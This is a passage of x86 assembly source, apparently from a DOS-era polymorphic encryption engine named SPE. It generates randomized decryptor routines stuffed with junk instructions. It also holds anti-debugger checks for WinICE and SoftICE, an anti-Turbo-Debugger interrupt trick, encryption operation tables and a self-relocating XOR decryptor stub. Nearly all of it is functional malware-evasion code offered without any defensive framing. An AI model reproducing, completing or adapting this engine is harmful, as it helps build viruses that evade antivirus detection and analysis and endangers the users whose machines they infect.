CHANGE_OFF_REG_RELO: MOV SI,DEC_OFF_COUNT CMP 1 PTR [SI+7],UNUSED_REG ;SMALL 1 PTR DS:SET_WR_FLAG JE NO_CHG_OFF NEXT_OFF_REG: MOV AL,[SI] AND AL,AL JE NO_CHG_OFF MOV BL,[SI+1] ;SMALL 1 PTR DS:OFF_REG CALL GEN_DEC JMP NEXT_OFF_REG ;-------------------------------------- CHANGE_ESP: CALL GET_RAND_4 MOV SI,DEC_ESP_COUNT JNE NO_CHG_ESP CMP AL,[SI-3] ;SMALL 1 PTR DS:STORE_WR_FLAG JE NO_CHG_OFF MOV AL,[SI] AND AL,AL JE NO_CHG_ESP JNS NO_INIT_DESP CALL CHK_MODE_SZ MOV [SI],AL NO_INIT_DESP: MOV BL,_ESP CALL GEN_DEC NO_CHG_ESP: CALL GET_RAND_4 JNE NO_CHG_OFF XOR AL,[SI-1] ;SMALL 1 PTR DS:SET_WR_FLAG JS NO_CHG_OFF MOV SI,DEC_OFF_COUNT MOV AL,[SI] AND AL,AL JE NO_CHG_OFF MOV BL,[SI+1] ;SMALL 1 PTR DS:OFF_REG JMP GEN_DEC ;-------------------------------------- INIT_OFF = $-START MOV SI,ADDRESS_MODE CALL GET_FREE_REG MOV [SI+13H],BL ;SMALL 1 PTR DS:OFF_REG CALL GEN_PUSH CALL GET_SHIT CMP BL,_EBP JNE THREE_MODE CALL DX INC AX JMP EBP_MODE THREE_MODE: CALL GET_RAND_3 EBP_MODE: XOR CX,CX ROR AL,2 MOV [SI],AX XOR CX,CX CALL DX JE SHORT_OPCODE MOV AX,2004H OR AH,BL MOV BH,BL SHL BH,3 PUSH AX CALL GET_RAND_4 DEC AX DEC AX POP AX JE EXT_MODE MOV AH,BL JP SECOND_M_MODE MOV 1 PTR [SI],0 MOV AH,45H JS SECOND_M_MODE CALL CHK_MODE JNE SECOND_M_MODE INC CX MOV AH,85H SECOND_M_MODE: INC CX OR AH,BH OR [SI],AX TEST 2 PTR [SI],0C0C0H JMP GET_RAND_DWORD SHORT_OPCODE: MOV AH,0FFH MOV AL,BL EXT_MODE: OR [SI],AX TEST 1 PTR [SI],(ADD_RIMM SHL 6) GET_RAND_DWORD: JE GO_MOV_WREG CALL GET_RAND_WORD AND AL,NOT 3 TEST 1 PTR [SI],(ADD_RB SHL 6) JE NO_ADD_RB CBW CWDE NO_ADD_RB: SUB EBP,EAX MOV [SI+6],EAX ;SMALL 4 PTR DS:DELTA_VALUE GO_MOV_WREG: XOR EAX,EAX CALL CHK_MODE_SZ SUB EBP,EAX SHR AL,CL MOV [SI+12H],AL ;SMALL 1 PTR DS:DEC_OFF_COUNT SHR EBP,CL MOV [SI+2],EBP ;SMALL 4 PTR DS:OFF_VALUE MOV EAX,SMALL 4 PTR DS:CURRENT_LEN SHR EAX,CL MOV ECX,EBP SUB EBP,EAX MOV [SI+0EH],EBP ;SMALL 4 PTR DS:TOP_ADDRESS JMP MOV_WREG ;-------------------------------------- INIT_COUNT = $-START CALL GET_RAND_4 JE NO_INIT CALL GET_FREE_REG MOV SMALL 1 PTR DS:COUNT_REG,BL CALL GEN_PUSH MOV ECX,SMALL 4 PTR DS:CURRENT_LEN SHR ECX,1 CALL CHK_MODE JNE IS_WM SHR ECX,1 IS_WM: JMP MOV_WREG_SH ;-------------------------------------- INIT_MASK = $-START CALL GET_RAND_4 JE NO_INIT CALL GET_FREE_REG MOV SMALL 1 PTR DS:MASK_REG,BL CALL GEN_PUSH CALL GET_RAND_WORD MOV SMALL 4 PTR DS:MASK_VALUE,EAX MOV SMALL 4 PTR DS:MASK_CR,EAX XCHG EAX,ECX MOV_WREG_SH: CALL GET_SHIT JMP MOV_WREG ;====================================== ENCRYPT_ITER: MOV CX,SMALL 2 PTR DS:LEN_SEEK JCXZ NO_CODE_ITER CALL GET_ENCRYPT MOV AX,[SI+SIZE_ENCRYPT_TBL-2] MOV 2 PTR DS:BUFF4ENCRYPT,AX PUSHF MOV BX,ADDRESS_EMPTY MOV SI,[BX] MOV [SI],DI LODSW MOV [BX],SI MOV AL,CL CALL GET_RAND_BYTE ADD AX,SMALL SEEK_TABLE XCHG AX,SI LODSB CBW STOSW ADD AX,SMALL TEMP_DECRYPTOR XCHG AX,BX DEC CX MOV SMALL 2 PTR DS:LEN_SEEK,CX JE IS_LAST_OFF SEEK_MOVE: LODSB MOV [SI-2],AL CMP AL,0FFH JNE SEEK_MOVE IS_LAST_OFF: CALL GET_RAND_WORD POPF JA UNARE_OPCODE STOSB XCHG CX,AX UNARE_OPCODE: BUFF4ENCRYPT = $-START DW 1234H NO_CODE_ITER: RETN ;-------------------------------------- GET_ENCRYPT: MOV AL,SIZE_ENCRYPT_TBL/2 CALL GET_RAND_BYTE SHL AX,1 ADD AX,SMALL ENCRYPT_TBL XCHG AX,SI LODSW STOSW CMP AL,0C0H RETN ;-------------------------------------- GET_TRICK: MOV SMALL 1 PTR DS:DIRTY_WREG,FREE_WREG MOV SMALL 1 PTR DS:DIRTY_SREG,FREE_SREG CALL GET_SHIT MOV SI,TRICK_TBL MOV AL,SIZE_TRICK_TBL ;-------------------------------------- ;SI=TABLE,AL=HIGH LIMIT CALL_RANDOM: CALL GET_RAND_BYTE SHL AX,1 ADD SI,AX JMP 2 PTR [SI] ;-------------------------------------- ;MOV AX,30XXH ;INT 21H ;CMP AL,7/CMP AL,6 ;JAE @@OK/JA @@OK ;RETN ;@@OK: TRICK_1 = $-START MOV CH,30H CALL MOV_AH CALL GEN_INT21 MOV CL,7 JMP CMP_JAX_AL ;-------------------------------------- ;MOV AX,19XXH ;INT 21H ;CMP AL,'Z'-'A'/'Z'-'A'+1 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_2 = $-START MOV CH,19H MOV AL,'Z'-'A' CMP EAX,12345678H ORG $-4 ;-------------------------------------- ;MOV AX,2AXXH ;INT 21H ;CMP AL,6/7 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_3 = $-START MOV CH,2AH MOV AL,6 CMP EAX,12345678H ORG $-4 ;-------------------------------------- ;MOV AX,54XXH ;INT 21H ;CMP AL,1/2 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_4 = $-START MOV CH,54H MOV AL,1 PUSH AX CALL MOV_AH JMP CMP_JBX_AL ;-------------------------------------- ;MOV AX,5802H ;INT 21H ;CMP AL,1/2 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_5 = $-START MOV CX,5802H MOV AL,1 PUSH AX CALL MOV_AX CMP_JBX_AL: CALL GEN_INT21 POP CX MOV BH,76H ;JBE JMP GO_CMP_JXX_AL ;-------------------------------------- ;MOV AX,1600H ;INT 2FH ;CMP AL,4/CMP AL,3 ;JAE @@OK/JA @@OK ;RETN ;@@OK: TRICK_6 = $-START XOR CL,CL CALL MOV_WIN MOV CL,4 CMP_JAX_AL: MOV BH,73H ;JAE GO_CMP_JXX_AL: JMP CMP_JXX_AL ;-------------------------------------- ;MOV AX,1200H ;INT 2FH ;CMP AL,0FFH ;JE @@OK ;RETN ;@@OK: TRICK_7 = $-START MOV CX,1200H MOV AL,0FFH JMP GEN_CODE ;-------------------------------------- ;MOV AX,4300H ;INT 2FH ;CMP AL,80H ;JE @@OK ;RETN ;@@OK: TRICK_8 = $-START MOV CX,4300H MOV AL,80H GEN_CODE: PUSH AX CALL MOV_INT2F CMP_JE_AL = $-START POP CX MOV BX,(74H SHL 8) OR _AL ;JE JMP CHECK_REG ;-------------------------------------- ;MOV AX,160AH ;INT 2FH ;AND AX,AX ;JE @@OK ;RETN ;@@OK: TRICK_9 = $-START MOV CL,0AH COMMON_CODE: CALL MOV_WIN CMP_JE_AX: MOV BX,(74H SHL 8) OR _AX ;JE JMP OR_JXX ;-------------------------------------- ;MOV AX,1687H ;INT 2FH ;AND AX,AX ;JE @@OK ;RETN ;@@OK: ;PUSH CS ;POP ES TRICK_10 = $-START MOV CL,87H CALL COMMON_CODE JMP RESTORE_ES ;-------------------------------------- ;MOV BX,X ;MOV AX,1684H ;INT 2FH ;AND DI,DI ;JE @@OK ;RETN ;@@OK: ;PUSH CS ;POP ES TRICK_14 = $-START MOV CX,BCHECKER_ID JMP GEN_DAPI_EP TRICK_15 = $-START MOV CX,IMMUNER_ID JMP GEN_DAPI_EP TRICK_16 = $-START MOV CX,SIWVID_ID JMP GEN_DAPI_EP TRICK_11 = $-START MOV CX,WINICE_ID GEN_DAPI_EP: MOV BL,_BX CALL MOV_WREG MOV CL,84H CALL MOV_WIN MOV BX,(74H SHL 8) OR _DI ;JE CALL OR_JXX_FREE RESTORE_ES: MOV SMALL 1 PTR DS:DIRTY_SREG,_ES JMP RESTORE_SREG ;-------------------------------------- ;CALL @@OK ;DB $... ;@@OK: ;POP DX ;MOV AX,900H ;INT 21H TRICK_12 = $-START INC SMALL 1 PTR DS:SHIT_FLAG CALL GET_RAND_3 ADD AL,15 ADD AX,DI PUSH AX SUB AX,SMALL ENCRYPT_BUFF-100H XCHG AX,CX CALL GEN_CALL POP AX DEC SMALL 1 PTR DS:SHIT_FLAG MOV 1 PTR [DI],'$' XCHG AX,DI MOV AL,5AH ;POP DX STOSB MOV BL,_DX CALL USED_WREG MOV CH,9 CALL MOV_AH MOV SMALL 1 PTR DS:DIRTY_SREG,_ES GEN_INT21: MOV BH,21H JMP INT_XX ;-------------------------------------- ;XOR BX,BX ;MOV AX,1683H ;INT 2FH ;AND BX,BX ;JNE @@OK ;RETN ;@@OK: TRICK_13 = $-START MOV BL,_BX CALL MOV_ZERO16 MOV CL,83H CALL MOV_WIN MOV BX,(75H SHL 8) OR _BX ;JNE OR_JXX_FREE: DEC SMALL 1 PTR DS:DIRTY_WREG ;FREE _AX OR_JXX: XOR CX,CX JMP CHECK_REG ;-------------------------------------- ;MOV BX,X ;ENUM {STDIN,STDOUT,STDERR} ;MOV AX,4407H ;INT 21H ;CMP AL,0FFH ;JE @@OK ;RETN ;@@OK: TRICK_17 = $-START CALL GET_RAND_3 XCHG AX,CX MOV BL,_BX CALL MOV_WREG MOV CX,4407H CALL MOV_AX PUSH -1 PUSH CMP_JE_AL JMP GEN_INT21 ;-------------------------------------- ;MOV AX,4A04H/1612H ;INT 2FH ;AND AX,AX ;JE @@OK ;RETN ;@@OK: ;PUSH CS ;POP ES TRICK_18 = $-START MOV CX,4A04H JMP INT2F_ES TRICK_19 = $-START MOV CX,1612H INT2F_ES: CALL MOV_INT2F CALL CMP_JE_AX JMP RESTORE_ES ;-------------------------------------- VIA_INT21_0 = $-START XOR CH,CH GEN_INT21_1: CALL MOV_AH JMP GEN_INT21 ;-------------------------------------- VIA_INT21_4C = $-START MOV CH,4CH JMP GEN_INT21_1 ;-------------------------------------- ;ENTRY: CL=CHECK NUMBER/BH=JAE/JBE CMP_JXX_AL: XOR CH,CH MOV BL,CH ;AX CALL DX JE CHECK_REG XOR BH,4 ;JA/JB TEST BH,AL JNE IS_JA INC CX CMP AL,12H ORG $-1 IS_JA: DEC CX ;-------------------------------------- ;ENTRY: BL=REG NUMBER ; BH=JXX CODE (JA/JAE/JB/ETC) ; CX=CHECK NUMBER (IF CX=0 THEN ASSUME THAT REG IS WORD, ; IF CX!=0 THEN ASSUME THAT REG IS AL) ;1. CMP ;2. IF CX=0: OR/TEST/AND CHECK_REG: CALL USED_WREG CALL GET_SHIT MOV AL,4 JCXZ GET_METHOD MOV AL,1 GET_METHOD: CALL GET_RAND_BYTE JNE NO_CMP_IMM AND BL,BL JNE IS_NOT_AX CALL DX JNE IS_NOT_AX MOV AL,3DH ;CMP AX JCXZ IS_CMP_WORD DEC AX STOSB JMP STORE_BYTE IS_NOT_AX: MOV AX,0F883H ;CMP REG16,IMM8 OR AH,BL JCXZ IS_CMP_WORD MOV AL,80H ;CMP REG8,IMM8 IS_CMP_WORD: STOSW STORE_BYTE: XCHG AX,CX STOSB JMP GET_JXX NO_CMP_IMM: MOV CX,0C085H ;TEST DEC AX JE STORE_OPCODE MOV CL,21H ;AND DEC AX JE STORE_OPCODE MOV CL,9 ;OR STORE_OPCODE: OR CH,BL SHL BL,3 OR CH,BL XCHG AX,CX STOSW GET_JXX: MOV AL,BH STOSB PUSH DI ;ADDRESS FOR CORRECT JXX STOSB ;------------------------------------- ;GET EXIT CODE: ;1. RETN / RETN XXXX ;2. JMP(CALL) 0 ;3. INT 20H ;4. MOV AX,0/INT 21H ;5. MOV AX,4CXXH/INT 21H MOV SMALL 1 PTR DS:DIRTY_WREG,FREE_WREG CALL GET_SHIT MOV SI,PROC_EXIT MOV AL,SIZE_PROC_EXIT CALL CALL_RANDOM CALL GET_RAND_3 ADD DI,AX POP AX PUSH DI XCHG AX,DI DEC AX SUB AX,DI STOSB POP DI JMP GET_SHIT ;------------------------------------------------ INT_SHIT = $-START CALL DX MOV SI,INT21_AX MOV BH,21H JE FAKE_INT MOV SI,INT2F_AX MOV BH,2FH FAKE_INT: LODSB CALL GET_RAND_BYTE SHL AX,1 ADD SI,AX LODSW PUSH BX CMP AL,0FFH XCHG AX,CX JNE IS_WORD_FN CALL MOV_AH JMP GEN_FAKE_INT IS_WORD_FN: CALL MOV_AX GEN_FAKE_INT: POP BX JMP INT_XX ;-------------------------------------- VIA_INT20 = $-START MOV BH,20H JMP INT_XX ;-------------------------------------- MOV_WIN: MOV CH,16H MOV_INT2F: CALL MOV_AX MOV BH,2FH ;-------------------------------------- ;ENTRY: BH - INT NUMBER ;1. 0CD,XX ;2. ZERO DS(ES)/PUSHF/CALL 4 PTR ES(DS):4*XX ;3. only for INT 21H: PUSH CS/MOV AX,50H/CALL AX INT_XX: MOV AL,3 CMP BH,21H JE IS_DOS_SERVICE DEC AX CMP CH,16H JNE IS_DOS_SERVICE DEC AX IS_DOS_SERVICE: CALL GET_RAND_BYTE JNE NO_TRIVIAL MOV BL,0CDH XCHG AX,BX STOSW RETN NO_TRIVIAL: DEC AX JNE FOR_DOS_SRVC ;-------------------------------------- ;1.PUSH 0(0000)/POP SEG ;2.ZERO WREG: ; 2.1 MOV SREG,WREG ; 2.2 PUSH WREG/POP SREG MOV SI,DIRTY_SREG LODSB CMP AL,FREE_SREG JNE IS_ES CALL DX JE IS_ES MOV AL,_DS SHL 3 IS_ES: MOV [SI-1],AL XCHG AX,CX CALL DX JNE VIA_WREG PUSH AX CALL DX SHL AL,1 OR AL,68H STOSB POP AX JP IS_BYTE STOSB IS_BYTE: JMP POP_STACK VIA_WREG: CALL GET_FREE_REG PUSH CX CALL MOV_ZERO16 CALL GET_SHIT CALL UNUSED_WREG CALL DX POP CX JE VIA_STACK MOV AL,8EH ;MOV SREG,WREG STOSB MOV AL,0C0H OR AL,BL JMP END_CLEAR VIA_STACK: MOV AL,50H ;PUSH WREG OR AL,BL POP_STACK: STOSB CALL GET_SHIT MOV AL,7 ;POP SREG END_CLEAR: OR AL,CL STOSB CALL GET_SHIT MOV AL,9CH ;PUSHF STOSB CALL GET_SHIT MOV AL,26H ;ES: (MIN) OR AL,CL STOSB MOV AX,1EFFH ;CALL FAR STOSW MOV AL,BH CBW SHL AX,2 STOSW ;INT ADDRESS CALL GET_SHIT ;-------------------------------------- RESTORE_SREG: CALL PUSH_SREG ;DIRTY_SREG=SEG NUMBER MOV AL,FREE_SREG XCHG AL,SMALL 1 PTR DS:DIRTY_SREG ;SET DIRTY_SREG TO FREE OR AL,7 ;POP SREG STOSB RETN ;-------------------------------------- FOR_DOS_SRVC: MOV CX,50H GEN_PUSH_CALL: CALL PUSH_SREG GEN_CALL: XOR BL,BL ;-------------------------------------- ;ENTRY: BL=0 FOR CALL/1 FOR JMP ; CX=OFFSET GEN_JMPCALL: CALL DX JNE CALL_VIA_WREG MOV AL,0E8H ;CALL NEAR OR AL,BL STOSB MOV AX,DI SUB AX,SMALL ENCRYPT_BUFF-100H-2 SUB AX,CX NEG AX STOSW RETN CALL_VIA_WREG: AND BL,BL PUSHF CALL GET_FREE_REG CALL MOV_WREG POPF MOV AX,0D0FFH ;CALL WREG JE IS_CALL MOV AH,0E0H ;JMP WREG IS_CALL: OR AH,BL STOSW ;-------------------------------------- UNUSED_WREG: PUSH CX MOV CL,BL MOV AL,1 SHL AL,CL XOR SMALL 1 PTR DS:DIRTY_WREG,AL POP CX RETN ;-------------------------------------- PSPCALL_SHIT = $-START MOV CX,52H JMP GEN_PUSH_CALL ;-------------------------------------- VIA_JMPCALL = $-START CALL DX XCHG AX,BX XOR CX,CX JMP GEN_JMPCALL ;-------------------------------------- MOVREG_SHIT = $-START CALL GET_FREE_REG CALL GET_RAND_WORD XCHG AX,CX CALL MOV_WREG JMP UNUSED_WREG ;-------------------------------------- INCDEC_SHIT = $-START CALL GET_FREE_REG CALL DX SHL AL,3 OR AL,40H ;INC/DEC SET_XCHG: OR AL,BL STOSB JMP UNUSED_WREG ;-------------------------------------- XCHG_SHIT = $-START CALL GET_FREE_REG MOV AL,90H ;XCHG(NOP) JMP SET_XCHG ;-------------------------------------- GET_VALID_SREG: CALL GET_RAND_3 INC AX ;CS,SS,DS SHL AL,3 CMP AL,SMALL 1 PTR DS:DIRTY_SREG JE GET_VALID_SREG RETN ;-------------------------------------- ;EXIT: BL=SOME WREG GET_FREE_REG: PUSH DI MOV DI,WREG_LIST XOR BL,BL MOV AH,[DI-1] ;SMALL 1 PTR DS:DIRTY_WREG XOR AL,AL PUSH DI FILL_WREG_LIST: SHR AH,1 JB NO_VALID_WREG STOSB INC BX NO_VALID_WREG: INC AX CMP AL,8 JNE FILL_WREG_LIST POP DI MOV AL,BL CALL GET_RAND_BYTE ADD DI,AX MOV BL,[DI] POP DI ;-------------------------------------- USED_WREG: PUSH CX MOV CL,BL MOV AL,1 SHL AL,CL OR SMALL 1 PTR DS:DIRTY_WREG,AL POP CX RETN ;-------------------------------------- MOV_ZERO32: DB 66H MOV_ZERO16: XOR CX,CX JMP MOV_WREG MOV_AH: CALL GET_RAND_WORD MOV CL,AL MOV_AX: MOV BL,_AX ;ECX=CONST,BL=REG NUM ;1. PUSH CONST (68/6A)/POP REG ;2. MOV REG,CONST (0B8H OR REG) ;3. XOR(SUB/MOV 0) REG/ADD(SUB NEG/OR/XOR) MOV_WREG: CALL GET_RAND_3 NULL_WREG: JNE IS_MOV_IMM MOV AL,68H ;PUSH IMM CALL CHECK_SIGN STOSB MOV EAX,ECX STOSB JNB IS_IMM8 DEC DI CALL STORE32 IS_IMM8: CALL GET_SHIT MOV AL,58H ;POP WREG OR AL,BL STOSB USED_SHIT: CALL USED_WREG JMP GET_SHIT IS_MOV_IMM: DEC AX JNE IS_MOV MOV AL,0B8H ;MOV OR AL,BL STOSB MOV EAX,ECX SAVE_OPCODE: CALL STORE32 SET_USED: JMP USED_SHIT IS_MOV: CALL GET_RAND_3 JNE NO_CALL_MOV PUSH ECX XOR ECX,ECX CALL DX CALL NULL_WREG POP ECX JMP SET_WREG NO_CALL_MOV: DEC AX JE NO_CLEAR_XOR MOV AL,31H-29H ;XOR NO_CLEAR_XOR: ADD AX,1829H ;SUB OR AH,BL SHL AH,3 OR AH,BL XCHG AX,SI CALL DX SHL AL,1 OR AX,SI STOSW CALL USED_SHIT SET_WREG: JECXZ SET_USED CALL GET_RAND_4 PUSH ECX DEC AX MOV AH,0F0H ;XOR JS IS_CASE MOV AH,0C8H ;OR JE IS_CASE MOV AH,0C0H ;ADD DEC AL JE IS_CASE MOV AH,0E8H ;SUB NEG ECX IS_CASE: OR AH,BL MOV AL,81H CALL CHECK_SIGN STOSW XCHG EAX,ECX JB SAVE_CONST STOSB JMP CONST_SAVED SAVE_CONST: CALL STORE32 CONST_SAVED: POP ECX JMP GET_SHIT ;-------------------------------------- CHECK_SIGN: AND BP,BP JE $+3 DB 66H CMP CX,7FH JB SET_EXT_BIT AND BP,BP JE $+3 DB 66H CMP CX,-80H JB NO_SET_BIT SET_EXT_BIT: OR AL,2 NO_SET_BIT: RETN ;-------------------------------------- STORE32: AND BP,BP JE BIT16 DB 66H ;STOSD BIT16: STOSW RETN ;-------------------------------------- GET_SHIT_32: PUSH AX SI CALL GET_RAND_8 JNE NO_SHIT MOV AL,LEN_SIMPLE32 CALL GET_RAND_BYTE ADD AX,SMALL SIMPLE_OP XCHG SI,AX MOVSB NO_SHIT: POP SI AX RETN ;-------------------------------------- GET_SHIT: AND BP,BP JNE GET_SHIT_32 CALL DX JE NO_GET_SHIT MOV SI,SHIT_FLAG CMP AL,[SI] JBE ALL_SHIT TEST AL,[SI+2] ;SMALL 1 PTR DS:DIRTY_WREG MOV AL,SIZE_SHIT JE ALL_SHIT SUB AL,SIZE_LAST_SHIT ALL_SHIT: INC 1 PTR [SI] PUSH BX CX MOV SI,PROC_SHIT CALL CALL_RANDOM POP CX BX DEC SMALL 2 PTR DS:SHIT_FLAG NO_GET_SHIT: RETN ;-------------------------------------- PUSH_SREG: CALL GET_VALID_SREG ADD AL,6 ;PUSH SREG STOSB JMP GET_SHIT ;-------------------------------------- ONE_SHIT = $-START MOV AL,LEN_SIMPLE_OP CALL GET_RAND_BYTE ADD AX,SMALL SIMPLE_OP XCHG AX,SI MOVSB CMP 1 PTR [DI-1],0CDH JNE NO_INT MOV AL,3FH-34H+1 CALL GET_RAND_BYTE ADD AL,34H STOSB NO_INT: RETN ;-------------------------------------- SMASHTOP_SHIT = $-START CMP SMALL 1 PTR DS:DIRTY_SREG,_DS SHL 3 JNE NO_PREFIX CALL GET_VALID_SREG ADD AL,26H ;ES: STOSB NO_PREFIX: CALL GET_ENCRYPT PUSHF RAND_OFFSET: MOV SI,ENCRYPT_BUFF MOV AX,DI SUB AX,SI CALL GET_RAND ADD SI,AX CMP 1 PTR [SI],'$' JE RAND_OFFSET INC AH STOSW POPF JA WAS_UNARE CALL GET_RAND_BYTE STOSB WAS_UNARE: RETN ;-------------------------------------- VIA_RETN = $-START CALL DX OR AL,0C2H STOSB JP IS_RETN ;IF 0C3H CALL GET_RAND_WORD OR AH,10H ;MIN=1000H STOSW IS_RETN: RETN ;-------------------------------------- AX_SHIT = $-START MOV AL,LEN_AX_OP CALL GET_RAND_BYTE ADD AX,SMALL AX_OP XCHG AX,SI MOVSB RETN ;-------------------------------------- GET_RAND_WORD: XOR AL,AL CMP AX,1234H ORG $-2 ;-------------------------------------- GET_RAND_8: MOV AL,8 CMP AX,1234H ORG $-2 ;-------------------------------------- GET_RAND_4: MOV AL,4 CMP AX,1234H ORG $-2 ;-------------------------------------- GET_RAND_3: MOV AL,3 CMP AX,1234H ORG $-2 ;-------------------------------------- OFF_GET_RAND_2 = $-START GET_RAND_2: MOV AL,2 ;-------------------------------------- GET_RAND_BYTE: XOR AH,AH ;-------------------------------------- ;ENTRY: AX=(LIMIT-1) OR EAX=0 IF INFINITY ;EXIT: AX=RANDOM VALUE, ZF=1 IF ZERO GET_RAND PROC MOVZX EAX,AX PUSH DX EAX MOV EAX,SMALL 4 PTR DS:RANDOMIZE MOV EDX,3A7FDH MUL EDX POP EDX ADD EAX,269EC3H MOV SMALL 4 PTR DS:RANDOMIZE,EAX AND DX,DX JE NO_LIMITED MUL EDX XCHG AX,DX NO_LIMITED: AND AX,AX POP DX RET ENDP ;-------------------------------------- DECRYPTOR = $-START RELO_DECRYPT: MOV AX,1234H FIRST_MASK = $-START-2 MOV CX,OUR_LEN CALL DOS_OFF_CALC DOS_OFF_CALC: POP DI DECRYPT_BYTE: XOR [DI+DECRYPT_DELTA],AX INC DI SUB AX,1234H SECOND_MASK = $-START-2 LOOP DECRYPT_BYTE DECRYPT_DELTA = $-DOS_OFF_CALC LEN_DECRYPTOR = $-RELO_DECRYPT ;-------------------------------------- ;DATA FOR SPE16 ;IF (LOBYTE)=0FFH THEN IT'S RANDOM INT21_AX = $-START DB LEN21_AX INT21_TBL DW 0BFFH,18FFH,19FFH,20FFH,3303H,3304H,54FFH,5800H,5802H LEN21_AX = ($-INT21_TBL)/2 INT2F_AX = $-START DB LEN2F_AX INT2F_TBL DW 1600H,1686H,4300H DW 100H,500H,600H,1000H,1100H,1400H,1A00H,1B00H,4000H LEN2F_AX = ($-INT2F_TBL)/2 SIMPLE_OP = $-START SIMPLE_TBL: CLC ;<- STC CMC SAHF NOP REPE REPNE SEGES SEGSS SEGDS ;<- USE IN SPE32 LEN_SIMPLE32 = $-SIMPLE_TBL STI CLI CLD STD INTO SEGCS DB 0CDH ;ANTI-TD (INT 34H-3FH) LEN_SIMPLE_OP = $-SIMPLE_TBL AX_OP = $-START AX_TBL: DAA DAS AAA AAS CBW LAHF DB 0D6H ;SETALC XLAT LEN_AX_OP = $-AX_TBL PROC_SHIT = $-START PSHIT_RELO DW ONE_SHIT,SMASHTOP_SHIT,PSPCALL_SHIT,MOVREG_SHIT DW INCDEC_SHIT AXSHIT_RELO DW XCHG_SHIT,AX_SHIT,INT_SHIT ;ALWAYS LAST SIZE_SHIT = ($-PSHIT_RELO)/2 SIZE_LAST_SHIT = ($-AXSHIT_RELO)/2 PROC_EXIT = $-START EXIT_RELO DW VIA_RETN,VIA_JMPCALL,VIA_INT20,VIA_INT21_0,VIA_INT21_4C SIZE_PROC_EXIT = ($-EXIT_RELO)/2 ;-------------------------------------- TRICK_TBL = $-START TRICK_RELO: DW TRICK_1,TRICK_2,TRICK_3,TRICK_4,TRICK_5,TRICK_6,TRICK_7 DW TRICK_8,TRICK_9,TRICK_10,TRICK_11,TRICK_12,TRICK_13 DW TRICK_14,TRICK_15,TRICK_16,TRICK_17,TRICK_18,TRICK_19 SIZE_TRICK_TBL = ($-TRICK_RELO)/2 ;ALSO MAY INCLUDED (WITH SOME CODE CHANGING IN GENERATING VALID SREG AND ;ASSUMES ON ENTRY CHECK_REG SUBROUTINE): ;1. AH=2AH - GET SYSTEM DATE (CHECKING VALID RETURN PARAM) ;2. AH=2CH - GET SYSTEM TIME (AS ABOVE) ;3. AH=2FH - GET DTA (BX=80H/ES RESTORED) ;4. AX=3305H - GET BOOT DRIVE (DL=1...1AH) ;5. AX=3306H - GET TRUE DOS VERSION (BL>=7) ;6. AX=1611H - WIN9X SPECIFIC (AX=0/DS RESTORED) ;7. AX=4A33H - CHECK MS-DOS VER 7 (AS ABOVE) ;8. AX=4B21H - WIN.COM IS ACTIVE? (AH=0) ;-------------------------------------- ENCRYPT_TBL = $-START ENCRYPT_RELO: XOR 1 PTR DS:[1234H],12H ORG $-3 ADD 1 PTR DS:[1234H],12H ORG $-3 SUB 1 PTR DS:[1234H],12H ORG $-3 ROL 1 PTR DS:[1234H],2 ORG $-3 ROR 1 PTR DS:[1234H],2 ORG $-3 DEC 1 PTR DS:[1234H] ORG $-2 INC 1 PTR DS:[1234H] ORG $-2 ROL 1 PTR DS:[1234H],1 ORG $-2 ROR 1 PTR DS:[1234H],1 ORG $-2 NOT 1 PTR DS:[1234H] ORG $-2 NEG 1 PTR DS:[1234H] ORG $-2 SIZE_ENCRYPT_TBL = $-ENCRYPT_RELO DECRYPT_TBL: XOR 1 PTR [BX],CL SUB 1 PTR [BX],CL ADD 1 PTR [BX],CL ROR 1 PTR [BX],CL ROL 1 PTR [BX],CL INC 1 PTR [BX] DEC 1 PTR [BX] ROR 1 PTR [BX],1 ROL 1 PTR [BX],1 NOT 1 PTR [BX] NEG 1 PTR [BX] ;-------------------------------------- ;DATA FOR SPE32 INIT_LIST = $-START DB LEN_INIT_LIST INIT_LIST_RELO DW INIT_OFF,INIT_COUNT,INIT_MASK LEN_INIT_LIST = ($-INIT_LIST_RELO)/2 LOOP_LIST = $-START DB LEN_LOOP_LIST LOOP_LIST_RELO DW CHANGE_MASK_REG,MOV_WORK_REG,CHANGE_WORK_REG DW STORE_WORK_REG,CHANGE_OFF_REG LEN_LOOP_LIST = ($-LOOP_LIST_RELO)/2 ;EBX=WORK_REG FOR CRYPTING DW 0CB0FH ;BSWAP EBX (ALWAYS TOP) DW 0DBF7H ;NEG EBX DW 0D3F7H ;NOT EBX DW 0CBD1H ;ROR EBX,1 DW 0C3D1H ;ROL EBX,1 DW 4390H ;INC EBX DW 4B90H ;DEC EBX DW 0CBC1H ;ROR EBX DW 0C3C1H ;ROL EBX DW 0EB81H ;SUB EBX DW 0C381H ;ADD EBX DW 0F381H ;XOR EBX DW 0FBBAH ;BTC (SKIP 0FH) OP32_IMM = $-START OP32_IMM_RELO DW 0F8BAH ;BTC (SKIP 0FH) DW 0F081H ;XOR DW 0E881H ;SUB DW 0C081H ;ADD DW 0C8C1H ;ROR X DW 0C0C1H ;ROL X DW 4090H ;INC (ONE BYTE) DW 4890H ;DEC (ONE BYTE) DW 0C8D1H ;ROR 1 DW 0C0D1H ;ROL 1 DW 0D0F7H ;NOT DW 0D8F7H ;NEG DW 0C80FH ;BSWAP (ALWAYS BOTTOM) LEN_OP32_IMM = ($-OP32_IMM_RELO)/2 OP32_REG = $-START DB 0BH ;OR (09H) OP32_REG_CHG = $-START OP32_REG_CHG_RELO DB 33H ;XOR (31H) DB 03H ;ADD (01H) DB 2BH ;SUB (29H) LEN_OP32_REG_CHG = $-OP32_REG_CHG_RELO ;FOR CRYPTING DB 33H ;XOR DB 2BH ;SUB DB 03H ;ADD ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SPE.ASI]ÄÄÄ